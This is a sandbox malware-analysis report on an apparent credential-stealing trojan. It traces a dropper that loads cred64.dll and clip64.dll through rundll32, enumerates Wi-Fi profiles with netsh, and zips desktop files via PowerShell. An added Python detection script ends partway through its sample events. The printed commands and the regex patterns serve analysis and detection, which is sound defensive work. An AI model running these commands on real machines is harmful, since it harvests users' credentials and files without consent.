Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_004E60E0 0_2_004E60E0
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00522968 0_2_00522968
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00527EB0 0_2_00527EB0
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00526F5B 0_2_00526F5B
Source: C:\Users\user\Desktop\wIaKimJFke.exe Code function: 0_2_00517780 0_2_00517780
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002E6809 5_2_002E6809
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002E707B 5_2_002E707B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002E24D0 5_2_002E24D0
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002E2968 5_2_002E2968
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002E7EB0 5_2_002E7EB0
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002E6F5B 5_2_002E6F5B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Code function: 5_2_002D7780 5_2_002D7780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E222580 10_2_6E222580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E231701 10_2_6E231701
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B7177F8 11_2_00007FFD9B7177F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B7D7732 11_2_00007FFD9B7D7732
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E2269A0 appears 34 times
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: wIaKimJFke.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: wIaKimJFke.exe Static PE information: Section: ZLIB complexity 0.9976810003443526
Source: wIaKimJFke.exe Static PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649
Source: explorgu.exe.0.dr Static PE information: Section: ZLIB complexity 0.9976810003443526
Source: explorgu.exe.0.dr Static PE information: Section: qrqrzugw ZLIB complexity 0.9941617398648649
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@15/21@0/1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File created: C:\Users\user\AppData\Roaming\006700e5a2ab05 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Users\user\Desktop\wIaKimJFke.exe File created: C:\Users\user\AppData\Local\Temp\00c07260dc Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64.dll.5.dr, cred64[1].dll.5.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: wIaKimJFke.exe ReversingLabs: Detection: 71%
Source: wIaKimJFke.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorgu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorgu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\wIaKimJFke.exe File read: C:\Users\user\Desktop\wIaKimJFke.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\wIaKimJFke.exe "C:\Users\user\Desktop\wIaKimJFke.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
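The process creations listed above form one chain: explorgu.exe starts a 32-bit rundll32.exe with the stealer DLL from %AppData%\Roaming, that rundll32 re-launches the 64-bit System32 copy with the same arguments, and the 64-bit copy then runs "netsh wlan show profiles" and a PowerShell Compress-Archive that stages a ZIP under %LocalAppData%\Temp. The immediate parent of both netsh and powershell is a signed Windows binary, so a detection that looks only at parent/child pairs misses the implant. The following is an added example, not part of this report or of Joe Sandbox, that applies three behavioural rules to process-creation events and walks the ancestry back to the dropped executable. The command lines are the ones shown above; the PIDs, the flat parent of explorgu.exe (the report records its parent as unknown) and the benign cmd.exe control at the end are constructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# "rundll32.exe" <path>.dll, <Export>  (quoted rundll32 path, optional space before the export)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+(?P<dll>[^,]+?\.dll)\s*,\s*(?P<export>\w+)', re.I)
NETSH_WLAN_RE = re.compile(r"\bnetsh\s+wlan\s+show\s+profiles?\b", re.I)
COMPRESS_RE = re.compile(r"""Compress-Archive\b.*?-DestinationPath\s+['"]?(?P<dst>[^'"\s]+)""", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Temp|Users\\Public)\\", re.I)
# Parents from which a human operator would plausibly run netsh by hand.
INTERACTIVE_PARENTS = {"cmd.exe", "explorer.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(by_pid, pid):
    """Image names from the process up to the highest ancestor we have an event for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return one finding per event that matches a rule, with its full lineage."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        hit = None
        if img == "rundll32.exe":
            m = RUNDLL_RE.search(e.cmdline)
            if m and USER_WRITABLE.search(m["dll"]):
                hit = ("rundll32 loads DLL from user-writable path", f"{m['dll']},{m['export']}")
        elif img == "netsh.exe":
            if NETSH_WLAN_RE.search(e.cmdline) and pimg not in INTERACTIVE_PARENTS:
                hit = ("Wi-Fi profile enumeration from non-interactive parent", pimg)
        elif img == "powershell.exe":
            m = COMPRESS_RE.search(e.cmdline)
            if m and pimg == "rundll32.exe" and USER_WRITABLE.search(m["dst"]):
                hit = ("archive staged under Temp by rundll32-spawned PowerShell", m["dst"])
        if hit:
            findings.append({"pid": e.pid, "rule": hit[0], "detail": hit[1],
                             "lineage": lineage(by_pid, e.pid)})
    return findings


CRED64_CMD = r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main'
CLIP64_CMD = r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main'
ZIP_CMD = (r"powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' "
           r"-DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal")

# Constructed events: command lines from the report, PIDs and parentage assumed.
EVENTS = [
    ProcessEvent(1100, 1, r"C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe",
                 r"C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe"),
    ProcessEvent(1200, 1100, r"C:\Windows\SysWOW64\rundll32.exe", CRED64_CMD),
    ProcessEvent(1300, 1200, r"C:\Windows\System32\rundll32.exe", CRED64_CMD),   # 32->64-bit hop
    ProcessEvent(1400, 1300, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
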